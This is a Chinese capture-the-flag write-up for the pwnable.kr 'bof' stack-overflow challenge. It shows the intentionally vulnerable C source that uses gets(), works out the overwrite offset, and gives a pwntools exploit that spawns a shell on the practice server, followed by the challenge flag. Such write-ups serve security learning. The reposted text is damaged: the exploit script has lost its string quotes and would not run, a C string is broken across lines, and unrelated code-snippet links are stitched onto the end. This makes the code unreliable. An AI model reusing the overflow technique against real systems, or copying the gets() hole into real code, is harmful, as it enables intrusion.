Pwnable-bof

Posted gaonuoqi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Pwnable-bof相关的知识,希望对你有一定的参考价值。

Download : http://pwnable.kr/bin/bof

Download : http://pwnable.kr/bin/bof.c

 

下载之后,先看看c源码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
        char overflowme[32];
        printf("overflow me : ");
        gets(overflowme);       // smash me!
        if(key == 0xcafebabe){
                system("/bin/sh");
        }
        else{
                printf("Nah..
");
        }
}
int main(int argc, char* argv[]){
        func(0xdeadbeef);
        return 0;
}

要让key==0xcafebabe才能get shell,将源程序拖到IDA

技术图片

 gets函数存在栈溢出,要覆盖a1的值让其变成0xcafebabe,那么我们需要偏移多少才能覆盖到a1,通过IDA可以看到需要偏移0x2c+0x8个字节才能覆盖到a1

技术图片

 

 技术图片

 那么就可以构造脚本了

from pwn import *
r=remote(pwnable.kr,9000)

payload=a*(0x2c+0x8)+p32(0xcafebabe)
r.sendline(payload)

r.interactive()

获得flag

技术图片

 

daddy, I just pwned a buFFer :)

以上是关于Pwnable-bof的主要内容,如果未能解决你的问题,请参考以下文章

VSCode自定义代码片段——CSS选择器

谷歌浏览器调试jsp 引入代码片段,如何调试代码片段中的js

片段和活动之间的核心区别是啥?哪些代码可以写成片段?

VSCode自定义代码片段——.vue文件的模板

VSCode自定义代码片段6——CSS选择器

VSCode自定义代码片段——声明函数